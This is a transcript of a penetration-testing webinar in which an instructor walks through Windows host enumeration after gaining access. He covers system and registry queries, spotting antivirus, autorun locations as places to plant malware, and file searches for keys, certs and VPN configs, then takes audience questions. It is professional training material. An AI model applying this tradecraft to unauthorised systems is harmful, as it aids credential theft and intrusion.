I'm going to cover that real quickly. I'm not going to go really, really deep into that, but you should get an idea. When you're on a machine, where pen testing is going is there's not a lot of value add in what vulnerabilities you can enumerate anymore, right? Because if all it is vulnerability enumeration, then they might as well just buy Nessus. You know, you don't need to pay me. You don't need to pay me to tell you what vulnerabilities you have. In a mature environment, you know, they don't need that. They already have that. They generally already have a security staff. So they're not going to pay you for you to tell them what vulnerabilities they have. If you're going to be doing pen tests like that, you're probably not doing very high dollar pen tests. You're probably in that, you know, $3,000 to $5,000 pen test range, and you're just running scans and giving them the reports. When you start testing companies that have large networks, you know, real complex infrastructures with lots of security products in the infrastructure, then they don't need you to just tell them, here's your vulnerabilities. What they need you to do is tell them stuff that's not in the vulnerability report. And you're going to get that from host enumeration and Active Directory enumeration. So host enumeration is system commands that you're going to run on the host to figure out what's there and what's there of value. Network enumeration is going to be network commands that are going to tell you what's juicy on the network and where is it at. So I think Bill asked a question earlier, will I be covering like how to get domain admin and stuff like that? And I won't be able to cover that today. We're already really kind of hard pressed for time, so I won't be able to do that. But let's say we take a look at host enumeration real quick. I'll give an example, like if you do something like the set command. So you just type set, and now all of the information about this host environment and path information is going to be here. What's his root drive, his home drive, what's, you know, everything that you need to know about this particular person's machine. You're going to get all of that from the set command. Okay. So you run commands like set, you run commands like system info. So you run the set command, you run the system info command. You know, this is how you're going to get patch information. This is how you're going to get all of that kind of stuff. Now, if you look here, I'm not going to do each of these because it'll take way too long. But if you look here, you'll see all the stuff that I have, like GP result, the ver command, command line registry queries. Like if you want to know what software is installed, a lot of times you can just search via the registry, right? So if you can search the registry for all the different pieces of software, how do you kill processes by name? How do you look for, you know, particular antivirus or host intrusion prevention and stuff like that? And for every process, just look up the name of that exe, and that's how you figure that stuff out, right? You want to get a list of what's installed on the system. Yeah, Craig, I don't know what is going on with Cloudflare and anything in Europe. Anything. You know, anybody coming from France, the UK, they flat out are always having Cloudflare issues. So I really swear I wish I knew what was going on with Cloudflare, because I got nothing. I got absolutely nothing. I do trouble ticket after trouble ticket. I got nothing. Future career prospects, really aggressively, Scott, look aggressively at cloud and mobile. Cloud and mobile. That'd be what you want to look at the most. And Scott, watch this webinar. This webinar is free. You can watch that. That'll be the one that'll help you the most. Okay, all right, going to get back to this stuff. Any pointer for mobile pen testing? The Dex iOS course. I think it's like $200, and that's the most in iOS, meaning Apple, the most in-depth thing I've ever seen. Unbelievable. I can't believe he did that much information for that price. Okay. All right, so if you look here, you'll see that we have all kinds of stuff, right? List mounted drives, list most recently run commands, recently run documents, open documents, find out what's set to auto run. This is also a great way for you to figure out where you can put your own malware. So if you can see where they put stuff, you can kind of figure out where you can put stuff. So people always want to know, how do I figure out this stuff? These are the commands that I run. This is how I figure out what's going on the machine. So you get on one machine and you start really digging into it, and that's how you start to really kind of put two and two together about the network that you're targeting. Okay, and then the next stuff is how to use the find and dir commands, right? So you can search the hard drive and sort it by time accessed, by time created, and time modified. So I do a series of dirs recursively throughout the entire file system and sort all the files by what they're accessing. So if you get on a machine and you start sorting everything that he's done by what's been accessed, what's been modified, when was it created, you can start figuring out, what does this person do on this machine? And you can do the same thing with critical files, right? So you can find all the files that are about, invoices, competitors, find risk assessments, find Visios, PCF, those are Cisco VPN files, ICA, that's Citrix files, any kind of cert, keys, logs, anything that you can find to tell you more about what's going on this box. That's where it's at, guys. I'm telling you, that's where the magic is at. Like, you want to figure out what is going on. This is how you do it. Okay, well, guys, we hit 3 o'clock. And now I have to get in and do some family stuff. So it's time for Joe to get into daddy mode. And my 11-year-old is giving me that look like, Dad, you promised. So I'm going to have to cut this short. I know I said I would go to 4, guys, but I'm going to have to wrap this up, do some daddy stuff. I'm going to send out everything that I did today. I'll update the text file. Give me another day or so, and then I'll hook this up for a webinar. I mean, not a webinar, a document, so that you guys can have this as courseware, kind of like a good PDF, so you can rip through it. The only question I have for you guys are asking about other pen testing webinars. What are you looking for? Like, what kinds of stuff do you want to see? Network, web, mobile, reversing, exploit dev. What is the stuff that you want me to try and put together for you? Okay, I'm seeing web, I'm seeing mobile, I'm seeing cloud, exploit dev, Python. Okay, and then some pen testing stuff, local escalation, UAC, more WAF, Linux. Oh, AWS and Azure, that'd be interesting. Huh. IPS stuff, okay. More web app stuff. Some reverse engineering, okay. Working old school without Metasploit, okay. All right, ooh, network access control, okay. Some database stuff, defense and forensics, okay. Free us of Metasploit. No problem, guys. A package which could cover real-life pen test scenarios, okay. Okay, web app and cloud. Is this video going to be available for download? Yes, it is. Bash, cool. We'll cover some scripting stuff. Next generation firewall bypass, okay. Writing exploit. How to hack the Gibson. You got it. You got it. A way that you can download it. I'll have to figure out a way that I can put this video up somewhere for download, because I got a feeling it's going to be a pretty decent sized video. Okay, detection, tracing, packet analysis. Okay, writing exploit. Okay. Zero cool. Okay, Bash and Python for pen testers. Oh, sweet, Jonathan, man. Yeah, any space will be very much appreciated. Yes, I'll include an updated version of this text file. Okay, and remediation. We really didn't talk about that, how to fix these vulnerabilities. You know, that'd be actually good stuff. Okay. All right. Oh, PowerShell for pen tester. That's definitely one that we haven't run in a while. You know, we should run that again. Okay. Yeah, next classes start Monday. So, yeah, actually Tuesday. So we've got exploit dev starting, and then we've got web app pen tester starting. Can I recommend some labs to test on? Man, I mean, a couple of things are out there. Any offers for new students? Yeah, there's tons of stuff out there. Check the website. Shoot me an email. Saeed, shoot me an email, joe@strategicsec.com, and I can help you kind of get squared away if there's any classes that you want. Oh, pen test lab for mobile. That'll be kind of interesting. Okay, like, yeah, throw some lab exercises for mobile. I could probably put that in my current lab environment. Which is better, EC Council or SANS? I'm an EC Council instructor, so probably wouldn't be good for me to get into that argument. All right, guys, let's button this up. And let's call it a day. And I'm going to have to go play daddy right now. So super, super thanks for all of you guys for helping out. I really appreciate it. Thanks for putting up with me. I got nothing but love for you guys, man. I appreciate it so much. And if there's anything I can do, please let me know. I'll do my absolute best to give you guys some good classes. Everybody take care.